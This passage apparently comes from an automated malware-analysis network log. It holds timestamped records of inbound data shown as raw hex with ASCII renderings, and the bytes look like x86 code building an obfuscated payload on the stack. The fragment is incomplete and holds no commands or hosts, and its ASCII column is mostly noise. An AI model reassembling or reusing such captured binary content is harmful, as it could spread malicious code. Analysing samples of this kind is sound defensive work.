ff 17 c6 85 8c Data Ascii: hiZjfklmn}ompqrsetuvwxxyz{\|G}G~YPGI
2022-05-16 08:29:53 UTC	1309	IN	Data Raw: f5 ff 32 c6 85 8d dc f5 ff cf c6 85 8e dc f5 ff e7 c6 85 8f dc f5 ff e1 c6 85 90 dc f5 ff db c6 85 91 dc f5 ff 66 c6 85 92 dc f5 ff 45 c6 85 93 dc f5 ff 92 c6 85 94 dc f5 ff b5 c6 85 95 dc f5 ff 26 c6 85 96 dc f5 ff b6 c6 85 97 dc f5 ff 30 c6 85 98 dc f5 ff a0 c6 85 99 dc f5 ff cc c6 85 9a dc f5 ff fa c6 85 9b dc f5 ff e1 c6 85 9c dc f5 ff c7 c6 85 9d dc f5 ff f8 c6 85 9e dc f5 ff 72 c6 85 9f dc f5 ff 56 c6 85 a0 dc f5 ff fe c6 85 a1 dc f5 ff 22 c6 85 a2 dc f5 ff fa c6 85 a3 dc f5 ff 30 c6 85 a4 dc f5 ff ec c6 85 a5 dc f5 ff 91 c6 85 a6 dc f5 ff fa c6 85 a7 dc f5 ff b8 c6 85 a8 dc f5 ff 64 c6 85 a9 dc f5 ff 2a c6 85 aa dc f5 ff 14 c6 85 ab dc f5 ff 56 c6 85 ac dc f5 ff f6 c6 85 ad dc f5 ff 6c c6 85 ae dc f5 ff a3 c6 85 af dc f5 ff 69 c6 85 b0 dc f5 ff 78 Data Ascii: 2fE&0rV"0d*Vlix
2022-05-16 08:29:53 UTC	1325	IN	Data Raw: 85 b1 e5 f5 ff 34 c6 85 b2 e5 f5 ff d2 c6 85 b3 e5 f5 ff c1 c6 85 b4 e5 f5 ff 7d c6 85 b5 e5 f5 ff d7 c6 85 b6 e5 f5 ff 3c c6 85 b7 e5 f5 ff 19 c6 85 b8 e5 f5 ff e0 c6 85 b9 e5 f5 ff f9 c6 85 ba e5 f5 ff e0 c6 85 bb e5 f5 ff 42 c6 85 bc e5 f5 ff cb c6 85 bd e5 f5 ff 19 c6 85 be e5 f5 ff 2c c6 85 bf e5 f5 ff 4f c6 85 c0 e5 f5 ff 7d c6 85 c1 e5 f5 ff 75 c6 85 c2 e5 f5 ff 86 c6 85 c3 e5 f5 ff 2e c6 85 c4 e5 f5 ff fd c6 85 c5 e5 f5 ff fd c6 85 c6 e5 f5 ff 7d c6 85 c7 e5 f5 ff e0 c6 85 c8 e5 f5 ff e4 c6 85 c9 e5 f5 ff dd c6 85 ca e5 f5 ff a4 c6 85 cb e5 f5 ff 63 c6 85 cc e5 f5 ff 31 c6 85 cd e5 f5 ff 75 c6 85 ce e5 f5 ff 7d c6 85 cf e5 f5 ff 77 c6 85 d0 e5 f5 ff dd c6 85 d1 e5 f5 ff 64 c6 85 d2 e5 f5 ff 07 c6 85 d3 e5 f5 ff c0 c6 85 d4 e5 f5 ff 33 c6 85 d5 e5 Data Ascii: 4}<B,O}u.}c1u}wd3
2022-05-16 08:29:53 UTC	1341	IN	Data Raw: ff 81 c6 85 d6 ee f5 ff 8e c6 85 d7 ee f5 ff 45 c6 85 d8 ee f5 ff 47 c6 85 d9 ee f5 ff cf c6 85 da ee f5 ff 5e c6 85 db ee f5 ff ad c6 85 dc ee f5 ff b1 c6 85 dd ee f5 ff 56 c6 85 de ee f5 ff 1c c6 85 df ee f5 ff 97 c6 85 e0 ee f5 ff 1a c6 85 e1 ee f5 ff 6d c6 85 e2 ee f5 ff 5a c6 85 e3 ee f5 ff 62 c6 85 e4 ee f5 ff ad c6 85 e5 ee f5 ff 0b c6 85 e6 ee f5 ff ec c6 85 e7 ee f5 ff 87 c6 85 e8 ee f5 ff ec c6 85 e9 ee f5 ff 8a c6 85 ea ee f5 ff 80 c6 85 eb ee f5 ff 07 c6 85 ec ee f5 ff d3 c6 85 ed ee f5 ff 53 c6 85 ee ee f5 ff cc c6 85 ef ee f5 ff d2 c6 85 f0 ee f5 ff 02 c6 85 f1 ee f5 ff a2 c6 85 f2 ee f5 ff 34 c6 85 f3 ee f5 ff 3c c6 85 f4 ee f5 ff e1 c6 85 f5 ee f5 ff 18 c6 85 f6 ee f5 ff b7 c6 85 f7 ee f5 ff a5 c6 85 f8 ee f5 ff 66 c6 85 f9 ee f5 ff b7 c6 Data Ascii: EG^VmZbS4<f
2022-05-16 08:29:53 UTC	1357	IN	Data Raw: fa f7 f5 ff b6 c6 85 fb f7 f5 ff dd c6 85 fc f7 f5 ff 03 c6 85 fd f7 f5 ff e8 c6 85 fe f7 f5 ff 6a c6 85 ff f7 f5 ff 7d c6 85 00 f8 f5 ff 36 c6 85 01 f8 f5 ff 31 c6 85 02 f8 f5 ff ed c6 85 03 f8 f5 ff d0 c6 85 04 f8 f5 ff ec c6 85 05 f8 f5 ff fd c6 85 06 f8 f5 ff a0 c6 85 07 f8 f5 ff 89 c6 85 08 f8 f5 ff b9 c6 85 09 f8 f5 ff 46 c6 85 0a f8 f5 ff cf c6 85 0b f8 f5 ff dc c6 85 0c f8 f5 ff a9 c6 85 0d f8 f5 ff 93 c6 85 0e f8 f5 ff a9 c6 85 0f f8 f5 ff 55 c6 85 10 f8 f5 ff 51 c6 85 11 f8 f5 ff f8 c6 85 12 f8 f5 ff 69 c6 85 13 f8 f5 ff 10 c6 85 14 f8 f5 ff 1c c6 85 15 f8 f5 ff 66 c6 85 16 f8 f5 ff 57 c6 85 17 f8 f5 ff a5 c6 85 18 f8 f5 ff b8 c6 85 19 f8 f5 ff 62 c6 85 1a f8 f5 ff 30 c6 85 1b f8 f5 ff b5 c6 85 1c f8 f5 ff 03 c6 85 1d f8 f5 ff 8d c6 85 1e f8 f5 Data Ascii: j}61FUQifWb0
2022-05-16 08:29:53 UTC	1373	IN	Data Raw: b0 c6 85 1f 01 f6 ff b8 c6 85 20 01 f6 ff b8 c6 85 21 01 f6 ff fc c6 85 22 01 f6 ff 07 c6 85 23 01 f6 ff ce c6 85 24 01 f6 ff d3 c6 85 25 01 f6 ff 8e c6 85 26 01 f6 ff aa c6 85 27 01 f6 ff cf c6 85 28 01 f6 ff 1e c6 85 29 01 f6 ff 39 c6 85 2a 01 f6 ff 0b c6 85 2b 01 f6 ff ad c6 85 2c 01 f6 ff f0 c6 85 2d 01 f6 ff 30 c6 85 2e 01 f6 ff 43 c6 85 2f 01 f6 ff f4 c6 85 30 01 f6 ff 64 c6 85 31 01 f6 ff c0 c6 85 32 01 f6 ff 81 c6 85 33 01 f6 ff 81 c6 85 34 01 f6 ff 71 c6 85 35 01 f6 ff 6d c6 85 36 01 f6 ff d0 c6 85 37 01 f6 ff ee c6 85 38 01 f6 ff ea c6 85 39 01 f6 ff 7a c6 85 3a 01 f6 ff 0f c6 85 3b 01 f6 ff 6d c6 85 3c 01 f6 ff 1d c6 85 3d 01 f6 ff 4a c6 85 3e 01 f6 ff 0b c6 85 3f 01 f6 ff 45 c6 85 40 01 f6 ff 5e c6 85 41 01 f6 ff 4d c6 85 42 01 f6 ff e1 c6 85 Data Ascii: !"#$%&'()9*+,-0.C/0d1234q5m6789z:;m<=J>?E@^AMB
2022-05-16 08:29:53 UTC	1389	IN	Data Raw: 0a f6 ff ad c6 85 44 0a f6 ff 68 c6 85 45 0a f6 ff 45 c6 85 46 0a f6 ff 38 c6 85 47 0a f6 ff c9 c6 85 48 0a f6 ff 95 c6 85 49 0a f6 ff 80 c6 85 4a 0a f6 ff 4a c6 85 4b 0a f6 ff 31 c6 85 4c 0a f6 ff 52 c6 85 4d 0a f6 ff b7 c6 85 4e 0a f6 ff dd c6 85 4f 0a f6 ff 03 c6 85 50 0a f6 ff b2 c6 85 51 0a f6 ff ba c6 85 52 0a f6 ff 20 c6 85 53 0a f6 ff 45 c6 85 54 0a f6 ff c4 c6 85 55 0a f6 ff 84 c6 85 56 0a f6 ff b1 c6 85 57 0a f6 ff 47 c6 85 58 0a f6 ff 0f c6 85 59 0a f6 ff fb c6 85 5a 0a f6 ff 5f c6 85 5b 0a f6 ff c1 c6 85 5c 0a f6 ff 77 c6 85 5d 0a f6 ff 7a c6 85 5e 0a f6 ff c4 c6 85 5f 0a f6 ff 79 c6 85 60 0a f6 ff 86 c6 85 61 0a f6 ff 6b c6 85 62 0a f6 ff a8 c6 85 63 0a f6 ff 2b c6 85 64 0a f6 ff 66 c6 85 65 0a f6 ff ae c6 85 66 0a f6 ff 70 c6 85 67 0a f6 ff Data Ascii: DhEEF8GHIJJK1LRMNOPQR SETUVWGXYZ_[\w]z^_y`akbc+dfefpg
2022-05-16 08:29:53 UTC	1405	IN	Data Raw: c6 85 68 13 f6 ff fd c6 85 69 13 f6 ff 05 c6 85 6a 13 f6 ff d5 c6 85 6b 13 f6 ff d0 c6 85 6c 13 f6 ff c0 c6 85 6d 13 f6 ff 75 c6 85 6e 13 f6 ff 23 c6 85 6f 13 f6 ff 48 c6 85 70 13 f6 ff fd c6 85 71 13 f6 ff c0 c6 85 72 13 f6 ff d0 c6 85 73 13 f6 ff f3 c6 85 74 13 f6 ff 32 c6 85 75 13 f6 ff 7b c6 85 76 13 f6 ff 8f c6 85 77 13 f6 ff 1e c6 85 78 13 f6 ff a8 c6 85 79 13 f6 ff bd c6 85 7a 13 f6 ff 53 c6 85 7b 13 f6 ff 80 c6 85 7c 13 f6 ff e0 c6 85 7d 13 f6 ff e1 c6 85 7e 13 f6 ff b1 c6 85 7f 13 f6 ff 46 c6 85 80 13 f6 ff 3c c6 85 81 13 f6 ff f9 c6 85 82 13 f6 ff 72 c6 85 83 13 f6 ff f0 c6 85 84 13 f6 ff 65 c6 85 85 13 f6 ff c0 c6 85 86 13 f6 ff 80 c6 85 87 13 f6 ff a7 c6 85 88 13 f6 ff 1c c6 85 89 13 f6 ff e6 c6 85 8a 13 f6 ff 22 c6 85 8b 13 f6 ff e1 c6 85 8c Data Ascii: hijklmun#oHpqrst2u{vwxyzS{\|}~F<re"
2022-05-16 08:29:53 UTC	1421	IN	Data Raw: f6 ff 66 c6 85 8d 1c f6 ff c0 c6 85 8e 1c f6 ff ae c6 85 8f 1c f6 ff cf c6 85 90 1c f6 ff a9 c6 85 91 1c f6 ff 5a c6 85 92 1c f6 ff 31 c6 85 93 1c f6 ff 6d c6 85 94 1c f6 ff 71 c6 85 95 1c f6 ff 95 c6 85 96 1c f6 ff ce c6 85 97 1c f6 ff a9 c6 85 98 1c f6 ff 1e c6 85 99 1c f6 ff c8 c6 85 9a 1c f6 ff 35 c6 85 9b 1c f6 ff 1c c6 85 9c 1c f6 ff 5b c6 85 9d 1c f6 ff 0b c6 85 9e 1c f6 ff 47 c6 85 9f 1c f6 ff f9 c6 85 a0 1c f6 ff 8e c6 85 a1 1c f6 ff ce c6 85 a2 1c f6 ff be c6 85 a3 1c f6 ff a0 c6 85 a4 1c f6 ff a9 c6 85 a5 1c f6 ff cf c6 85 a6 1c f6 ff 68 c6 85 a7 1c f6 ff e4 c6 85 a8 1c f6 ff d8 c6 85 a9 1c f6 ff 46 c6 85 aa 1c f6 ff 47 c6 85 ab 1c f6 ff cf c6 85 ac 1c f6 ff ec c6 85 ad 1c f6 ff f2 c6 85 ae 1c f6 ff 6a c6 85 af 1c f6 ff 8d c6 85 b0 1c f6 ff 1c Data Ascii: fZ1mq5[GhFGj
2022-05-16 08:29:53 UTC	1437	IN	Data Raw: 85 b1 25 f6 ff 26 c6 85 b2 25 f6 ff 9e c6 85 b3 25 f6 ff a3 c6 85 b4 25 f6 ff b2 c6 85 b5 25 f6 ff f2 c6 85 b6 25 f6 ff 95 c6 85 b7 25 f6 ff bc c6 85 b8 25 f6 ff 0b c6 85 b9 25 f6 ff 33 c6 85 ba 25 f6 ff 97 c6 85 bb 25 f6 ff 2c c6 85 bc 25 f6 ff 3c c6 85 bd 25 f6 ff 54 c6 85 be 25 f6 ff 94 c6 85 bf 25 f6 ff 59 c6 85 c0 25 f6 ff cf c6 85 c1 25 f6 ff a9 c6 85 c2 25 f6 ff 62 c6 85 c3 25 f6 ff 91 c6 85 c4 25 f6 ff b8 c6 85 c5 25 f6 ff 76 c6 85 c6 25 f6 ff 2e c6 85 c7 25 f6 ff 3e c6 85 c8 25 f6 ff 83 c6 85 c9 25 f6 ff 4b c6 85 ca 25 f6 ff 72 c6 85 cb 25 f6 ff a7 c6 85 cc 25 f6 ff bf c6 85 cd 25 f6 ff 46 c6 85 ce 25 f6 ff a9 c6 85 cf 25 f6 ff cf c6 85 d0 25 f6 ff 1e c6 85 d1 25 f6 ff 52 c6 85 d2 25 f6 ff 37 c6 85 d3 25 f6 ff 35 c6 85 d4 25 f6 ff 05 c6 85 d5 25 Data Ascii: %&%%%%%%%%3%%,%<%T%%Y%%%b%%%v%.%>%%K%r%%%F%%%%R%7%5%%
2022-05-16 08:29:53 UTC	1453	IN	Data Raw: ff 85 c6 85 d6 2e f6 ff 94 c6 85 d7 2e f6 ff 6e c6 85 d8 2e f6 ff 0b c6 85 d9 2e f6 ff 6d c6 85 da 2e f6 ff cd c6 85 db 2e f6 ff 2d c6 85 dc 2e f6 ff 68 c6 85 dd 2e f6 ff 07 c6 85 de 2e f6 ff 07 c6 85 df 2e f6 ff c2 c6 85 e0 2e f6 ff 81 c6 85 e1 2e f6 ff c9 c6 85 e2 2e f6 ff fe c6 85 e3 2e f6 ff 30 c6 85 e4 2e f6 ff 56 c6 85 e5 2e f6 ff 2e c6 85 e6 2e f6 ff 25 c6 85 e7 2e f6 ff bd c6 85 e8 2e f6 ff 08 c6 85 e9 2e f6 ff 5a c6 85 ea 2e f6 ff cf c6 85 eb 2e f6 ff d5 c6 85 ec 2e f6 ff 25 c6 85 ed 2e f6 ff 53 c6 85 ee 2e f6 ff 33 c6 85 ef 2e f6 ff bd c6 85 f0 2e f6 ff 19 c6 85 f1 2e f6 ff 0c c6 85 f2 2e f6 ff 47 c6 85 f3 2e f6 ff 47 c6 85 f4 2e f6 ff ee c6 85 f5 2e f6 ff ab c6 85 f6 2e f6 ff 56 c6 85 f7 2e f6 ff 56 c6 85 f8 2e f6 ff 56 c6 85 f9 2e f6 ff 5a c6 Data Ascii: ..n..m..-.h.......0.V...%...Z...%.S.3....G.G...V.V.V.Z
2022-05-16 08:29:53 UTC	1469	IN	Data Raw: fa 37 f6 ff 3b c6 85 fb 37 f6 ff 5d c6 85 fc 37 f6 ff c3 c6 85 fd 37 f6 ff f0 c6 85 fe 37 f6 ff ab c6 85 ff 37 f6 ff 8b c6 85 00 38 f6 ff 89 c6 85 01 38 f6 ff 66 c6 85 02 38 f6 ff 77 c6 85 03 38 f6 ff 7b c6 85 04 38 f6 ff a1 c6 85 05 38 f6 ff 68 c6 85 06 38 f6 ff 2c c6 85 07 38 f6 ff e3 c6 85 08 38 f6 ff 8c c6 85 09 38 f6 ff d7 c6 85 0a 38 f6 ff a1 c6 85 0b 38 f6 ff 0b c6 85 0c 38 f6 ff 7d c6 85 0d 38 f6 ff 65 c6 85 0e 38 f6 ff be c6 85 0f 38 f6 ff 2c c6 85 10 38 f6 ff fd c6 85 11 38 f6 ff 29 c6 85 12 38 f6 ff 7d c6 85 13 38 f6 ff e8 c6 85 14 38 f6 ff 84 c6 85 15 38 f6 ff d3 c6 85 16 38 f6 ff 33 c6 85 17 38 f6 ff 4c c6 85 18 38 f6 ff 31 c6 85 19 38 f6 ff dd c6 85 1a 38 f6 ff 58 c6 85 1b 38 f6 ff 0b c6 85 1c 38 f6 ff 47 c6 85 1d 38 f6 ff 33 c6 85 1e 38 f6 Data Ascii: 7;7]777788f8w8{88h8,888888}8e88,88)8}888838L8188X88G838
2022-05-16 08:29:53 UTC	1485	IN	Data Raw: 56 c6 85 1f 41 f6 ff 56 c6 85 20 41 f6 ff da c6 85 21 41 f6 ff 1c c6 85 22 41 f6 ff 40 c6 85 23 41 f6 ff b7 c6 85 24 41 f6 ff 3a c6 85 25 41 f6 ff 06 c6 85 26 41 f6 ff f8 c6 85 27 41 f6 ff 0b c6 85 28 41 f6 ff 1e c6 85 29 41 f6 ff 8b c6 85 2a 41 f6 ff b9 c6 85 2b 41 f6 ff 22 c6 85 2c 41 f6 ff 92 c6 85 2d 41 f6 ff a9 c6 85 2e 41 f6 ff 54 c6 85 2f 41 f6 ff ee c6 85 30 41 f6 ff eb c6 85 31 41 f6 ff 88 c6 85 32 41 f6 ff 07 c6 85 33 41 f6 ff 92 c6 85 34 41 f6 ff 69 c6 85 35 41 f6 ff 25 c6 85 36 41 f6 ff cf c6 85 37 41 f6 ff 45 c6 85 38 41 f6 ff fa c6 85 39 41 f6 ff aa c6 85 3a 41 f6 ff 3a c6 85 3b 41 f6 ff c1 c6 85 3c 41 f6 ff 0b c6 85 3d 41 f6 ff 5a c6 85 3e 41 f6 ff cf c6 85 3f 41 f6 ff dd c6 85 40 41 f6 ff ac c6 85 41 41 f6 ff eb c6 85 42 41 f6 ff de c6 85 Data Ascii: VAV A!A"A@#A$A:%A&A'A(A)A*A+A",A-A.AT/A0A1A2A3A4Ai5A%6A7AE8A9A:A:;A<A=AZ>A?A@AAABA
2022-05-16 08:29:53 UTC	1501	IN	Data Raw: 4a f6 ff b9 c6 85 44 4a f6 ff 07 c6 85 45 4a f6 ff 43 c6 85 46 4a f6 ff d3 c6 85 47 4a f6 ff 8d c6 85 48 4a f6 ff 22 c6 85 49 4a f6 ff 34 c6 85 4a 4a f6 ff 64 c6 85 4b 4a f6 ff a9 c6 85 4c 4a f6 ff 80 c6 85 4d 4a f6 ff 58 c6 85 4e 4a f6 ff ee c6 85 4f 4a f6 ff 67 c6 85 50 4a f6 ff f8 c6 85 51 4a f6 ff 81 c6 85 52 4a f6 ff fd c6 85 53 4a f6 ff 8d c6 85 54 4a f6 ff 79 c6 85 55 4a f6 ff ee c6 85 56 4a f6 ff 0f c6 85 57 4a f6 ff 6d c6 85 58 4a f6 ff 5a c6 85 59 4a f6 ff 09 c6 85 5a 4a f6 ff e4 c6 85 5b 4a f6 ff c2 c6 85 5c 4a f6 ff f8 c6 85 5d 4a f6 ff 6d c6 85 5e 4a f6 ff e2 c6 85 5f 4a f6 ff 0e c6 85 60 4a f6 ff fc c6 85 61 4a f6 ff bd c6 85 62 4a f6 ff eb c6 85 63 4a f6 ff 35 c6 85 64 4a f6 ff 43 c6 85 65 4a f6 ff 1e c6 85 66 4a f6 ff 0b c6 85 67 4a f6 ff Data Ascii: JDJEJCFJGJHJ"IJ4JJdKJLJMJXNJOJgPJQJRJSJTJyUJVJWJmXJZYJZJ[J\J]Jm^J_J`JaJbJcJ5dJCeJfJgJ
2022-05-16 08:29:53 UTC	1517	IN	Data Raw: c6 85 68 53 f6 ff 47 c6 85 69 53 f6 ff cf c6 85 6a 53 f6 ff 5a c6 85 6b 53 f6 ff 74 c6 85 6c 53 f6 ff 05 c6 85 6d 53 f6 ff 20 c6 85 6e 53 f6 ff fc c6 85 6f 53 f6 ff bc c6 85 70 53 f6 ff a9 c6 85 71 53 f6 ff 56 c6 85 72 53 f6 ff 22 c6 85 73 53 f6 ff 3d c6 85 74 53 f6 ff 6a c6 85 75 53 f6 ff e4 c6 85 76 53 f6 ff 78 c6 85 77 53 f6 ff 43 c6 85 78 53 f6 ff 47 c6 85 79 53 f6 ff cf c6 85 7a 53 f6 ff 84 c6 85 7b 53 f6 ff 55 c6 85 7c 53 f6 ff b1 c6 85 7d 53 f6 ff 03 c6 85 7e 53 f6 ff f4 c6 85 7f 53 f6 ff 92 c6 85 80 53 f6 ff 09 c6 85 81 53 f6 ff c5 c6 85 82 53 f6 ff 5a c6 85 83 53 f6 ff 54 c6 85 84 53 f6 ff f5 c6 85 85 53 f6 ff fc c6 85 86 53 f6 ff f8 c6 85 87 53 f6 ff 6d c6 85 88 53 f6 ff 81 c6 85 89 53 f6 ff f9 c6 85 8a 53 f6 ff 99 c6 85 8b 53 f6 ff 30 c6 85 8c Data Ascii: hSGiSjSZkStlSmS nSoSpSqSVrS"sS=tSjuSvSxwSCxSGySzS{SU\|S}S~SSSSSZSTSSSSmSSSS0
2022-05-16 08:29:53 UTC	1533	IN	Data Raw: f6 ff fb c6 85 8d 5c f6 ff 20 c6 85 8e 5c f6 ff 6a c6 85 8f 5c f6 ff 57 c6 85 90 5c f6 ff e1 c6 85 91 5c f6 ff 43 c6 85 92 5c f6 ff 7f c6 85 93 5c f6 ff 71 c6 85 94 5c f6 ff b9 c6 85 95 5c f6 ff f3 c6 85 96 5c f6 ff b8 c6 85 97 5c f6 ff b8 c6 85 98 5c f6 ff 07 c6 85 99 5c f6 ff 1d c6 85 9a 5c f6 ff bf c6 85 9b 5c f6 ff ad c6 85 9c 5c f6 ff 52 c6 85 9d 5c f6 ff 30 c6 85 9e 5c f6 ff e1 c6 85 9f 5c f6 ff ea c6 85 a0 5c f6 ff 0e c6 85 a1 5c f6 ff f6 c6 85 a2 5c f6 ff cd c6 85 a3 5c f6 ff 17 c6 85 a4 5c f6 ff 8c c6 85 a5 5c f6 ff f5 c6 85 a6 5c f6 ff 8b c6 85 a7 5c f6 ff 08 c6 85 a8 5c f6 ff ae c6 85 a9 5c f6 ff b1 c6 85 aa 5c f6 ff 36 c6 85 ab 5c f6 ff 11 c6 85 ac 5c f6 ff 6d c6 85 ad 5c f6 ff e1 c6 85 ae 5c f6 ff 66 c6 85 af 5c f6 ff 82 c6 85 b0 5c f6 ff 3f Data Ascii: \ \j\W\\C\\q\\\\\\\\\R\0\\\\\\\\\\\\\6\\m\\f\\?
2022-05-16 08:29:53 UTC	1549	IN	Data Raw: 85 b1 65 f6 ff b9 c6 85 b2 65 f6 ff 2a c6 85 b3 65 f6 ff e8 c6 85 b4 65 f6 ff 4e c6 85 b5 65 f6 ff 62 c6 85 b6 65 f6 ff 35 c6 85 b7 65 f6 ff a7 c6 85 b8 65 f6 ff b9 c6 85 b9 65 f6 ff 1b c6 85 ba 65 f6 ff 11 c6 85 bb 65 f6 ff c8 c6 85 bc 65 f6 ff e6 c6 85 bd 65 f6 ff 14 c6 85 be 65 f6 ff 28 c6 85 bf 65 f6 ff b2 c6 85 c0 65 f6 ff a0 c6 85 c1 65 f6 ff 93 c6 85 c2 65 f6 ff 59 c6 85 c3 65 f6 ff 7b c6 85 c4 65 f6 ff db c6 85 c5 65 f6 ff e8 c6 85 c6 65 f6 ff 1e c6 85 c7 65 f6 ff 34 c6 85 c8 65 f6 ff e1 c6 85 c9 65 f6 ff 69 c6 85 ca 65 f6 ff df c6 85 cb 65 f6 ff 61 c6 85 cc 65 f6 ff 4e c6 85 cd 65 f6 ff 76 c6 85 ce 65 f6 ff 27 c6 85 cf 65 f6 ff f8 c6 85 d0 65 f6 ff 94 c6 85 d1 65 f6 ff 10 c6 85 d2 65 f6 ff a4 c6 85 d3 65 f6 ff c1 c6 85 d4 65 f6 ff 9e c6 85 d5 65 Data Ascii: ee*eeNebe5eeeeeeee(eeeeYe{eeee4eeieeaeNeve'eeeeeee
2022-05-16 08:29:53 UTC	1565	IN	Data Raw: ff 8e c6 85 d6 6e f6 ff 56 c6 85 d7 6e f6 ff b2 c6 85 d8 6e f6 ff 03 c6 85 d9 6e f6 ff 43 c6 85 da 6e f6 ff 9e c6 85 db 6e f6 ff 38 c6 85 dc 6e f6 ff be c6 85 dd 6e f6 ff 6d c6 85 de 6e f6 ff 44 c6 85 df 6e f6 ff 1e c6 85 e0 6e f6 ff 0b c6 85 e1 6e f6 ff 66 c6 85 e2 6e f6 ff bb c6 85 e3 6e f6 ff 07 c6 85 e4 6e f6 ff c1 c6 85 e5 6e f6 ff c8 c6 85 e6 6e f6 ff 7a c6 85 e7 6e f6 ff f1 c6 85 e8 6e f6 ff 4d c6 85 e9 6e f6 ff f1 c6 85 ea 6e f6 ff 10 c6 85 eb 6e f6 ff b9 c6 85 ec 6e f6 ff 73 c6 85 ed 6e f6 ff 4a c6 85 ee 6e f6 ff d7 c6 85 ef 6e f6 ff 9c c6 85 f0 6e f6 ff d6 c6 85 f1 6e f6 ff 30 c6 85 f2 6e f6 ff e1 c6 85 f3 6e f6 ff 69 c6 85 f4 6e f6 ff 7d c6 85 f5 6e f6 ff e9 c6 85 f6 6e f6 ff 98 c6 85 f7 6e f6 ff 5a c6 85 f8 6e f6 ff 07 c6 85 f9 6e f6 ff 9e c6 Data Ascii: nVnnnCnn8nnmnDnnnfnnnnnznnMnnnnsnJnnnn0nnin}nnnZnn
2022-05-16 08:29:53 UTC	1581	IN	Data Raw: fa 77 f6 ff df c6 85 fb 77 f6 ff 59 c6 85 fc 77 f6 ff 74 c6 85 fd 77 f6 ff 18 c6 85 fe 77 f6 ff e4 c6 85 ff 77 f6 ff 46 c6 85 00 78 f6 ff 0f c6 85 01 78 f6 ff 11 c6 85 02 78 f6 ff 91 c6 85 03 78 f6 ff 03 c6 85 04 78 f6 ff fb c6 85 05 78 f6 ff b6 c6 85 06 78 f6 ff 55 c6 85 07 78 f6 ff a6 c6 85 08 78 f6 ff b8 c6 85 09 78 f6 ff e1 c6 85 0a 78 f6 ff 7f c6 85 0b 78 f6 ff 7f c6 85 0c 78 f6 ff bd c6 85 0d 78 f6 ff 1d c6 85 0e 78 f6 ff e3 c6 85 0f 78 f6 ff 25 c6 85 10 78 f6 ff 33 c6 85 11 78 f6 ff 33 c6 85 12 78 f6 ff 26 c6 85 13 78 f6 ff 37 c6 85 14 78 f6 ff ba c6 85 15 78 f6 ff de c6 85 16 78 f6 ff 3c c6 85 17 78 f6 ff c6 c6 85 18 78 f6 ff be c6 85 19 78 f6 ff ab c6 85 1a 78 f6 ff a9 c6 85 1b 78 f6 ff cf c6 85 1c 78 f6 ff 94 c6 85 1d 78 f6 ff 98 c6 85 1e 78 f6 Data Ascii: wwYwtwwwFxxxxxxxUxxxxxxxxx%x3x3x&x7xxx<xxxxxxxx
2022-05-16 08:29:53 UTC	1597	IN	Data Raw: 81 c6 85 1f 81 f6 ff a4 c6 85 20 81 f6 ff b7 c6 85 21 81 f6 ff ff c6 85 22 81 f6 ff 81 c6 85 23 81 f6 ff 62 c6 85 24 81 f6 ff 1c c6 85 25 81 f6 ff e4 c6 85 26 81 f6 ff a5 c6 85 27 81 f6 ff e1 c6 85 28 81 f6 ff 69 c6 85 29 81 f6 ff 84 c6 85 2a 81 f6 ff c3 c6 85 2b 81 f6 ff 86 c6 85 2c 81 f6 ff ea c6 85 2d 81 f6 ff b8 c6 85 2e 81 f6 ff f5 c6 85 2f 81 f6 ff 45 c6 85 30 81 f6 ff 40 c6 85 31 81 f6 ff 2e c6 85 32 81 f6 ff fd c6 85 33 81 f6 ff 1d c6 85 34 81 f6 ff bc c6 85 35 81 f6 ff 06 c6 85 36 81 f6 ff b0 c6 85 37 81 f6 ff 21 c6 85 38 81 f6 ff ad c6 85 39 81 f6 ff 43 c6 85 3a 81 f6 ff 33 c6 85 3b 81 f6 ff f6 c6 85 3c 81 f6 ff 2e c6 85 3d 81 f6 ff 03 c6 85 3e 81 f6 ff 1b c6 85 3f 81 f6 ff 3c c6 85 40 81 f6 ff 70 c6 85 41 81 f6 ff 0f c6 85 42 81 f6 ff 56 c6 85 Data Ascii: !"#b$%&'(i)*+,-./E0@1.234567!89C:3;<.=>?<@pABV
2022-05-16 08:29:53 UTC	1613	IN	Data Raw: 8a f6 ff 9f c6 85 44 8a f6 ff 7f c6 85 45 8a f6 ff c5 c6 85 46 8a f6 ff 44 c6 85 47 8a f6 ff bb c6 85 48 8a f6 ff 42 c6 85 49 8a f6 ff 0c c6 85 4a 8a f6 ff 6a c6 85 4b 8a f6 ff 40 c6 85 4c 8a f6 ff f0 c6 85 4d 8a f6 ff 6d c6 85 4e 8a f6 ff c4 c6 85 4f 8a f6 ff 7a c6 85 50 8a f6 ff ed c6 85 51 8a f6 ff 98 c6 85 52 8a f6 ff 96 c6 85 53 8a f6 ff f8 c6 85 54 8a f6 ff 54 c6 85 55 8a f6 ff 1b c6 85 56 8a f6 ff 6e c6 85 57 8a f6 ff ab c6 85 58 8a f6 ff b4 c6 85 59 8a f6 ff 49 c6 85 5a 8a f6 ff a9 c6 85 5b 8a f6 ff 5a c6 85 5c 8a f6 ff 33 c6 85 5d 8a f6 ff bc c6 85 5e 8a f6 ff 0c c6 85 5f 8a f6 ff 2e c6 85 60 8a f6 ff 3b c6 85 61 8a f6 ff dd c6 85 62 8a f6 ff e8 c6 85 63 8a f6 ff ca c6 85 64 8a f6 ff b9 c6 85 65 8a f6 ff bd c6 85 66 8a f6 ff e2 c6 85 67 8a f6 ff Data Ascii: DEFDGHBIJjK@LMmNOzPQRSTTUVnWXYIZ[Z\3]^_.`;abcdefg
2022-05-16 08:29:53 UTC	1629	IN	Data Raw: c6 85 68 93 f6 ff 56 c6 85 69 93 f6 ff 00 c6 85 6a 93 f6 ff bd c6 85 6b 93 f6 ff e9 c6 85 6c 93 f6 ff 89 c6 85 6d 93 f6 ff 0d c6 85 6e 93 f6 ff 80 c6 85 6f 93 f6 ff f4 c6 85 70 93 f6 ff b8 c6 85 71 93 f6 ff 66 c6 85 72 93 f6 ff ef c6 85 73 93 f6 ff 1b c6 85 74 93 f6 ff 1d c6 85 75 93 f6 ff ff c6 85 76 93 f6 ff 0b c6 85 77 93 f6 ff f8 c6 85 78 93 f6 ff f4 c6 85 79 93 f6 ff 7a c6 85 7a 93 f6 ff 35 c6 85 7b 93 f6 ff e6 c6 85 7c 93 f6 ff 69 c6 85 7d 93 f6 ff 07 c6 85 7e 93 f6 ff 84 c6 85 7f 93 f6 ff 56 c6 85 80 93 f6 ff 65 c6 85 81 93 f6 ff c6 c6 85 82 93 f6 ff 02 c6 85 83 93 f6 ff 44 c6 85 84 93 f6 ff 52 c6 85 85 93 f6 ff 2e c6 85 86 93 f6 ff 7e c6 85 87 93 f6 ff bf c6 85 88 93 f6 ff 37 c6 85 89 93 f6 ff 4d c6 85 8a 93 f6 ff e5 c6 85 8b 93 f6 ff 24 c6 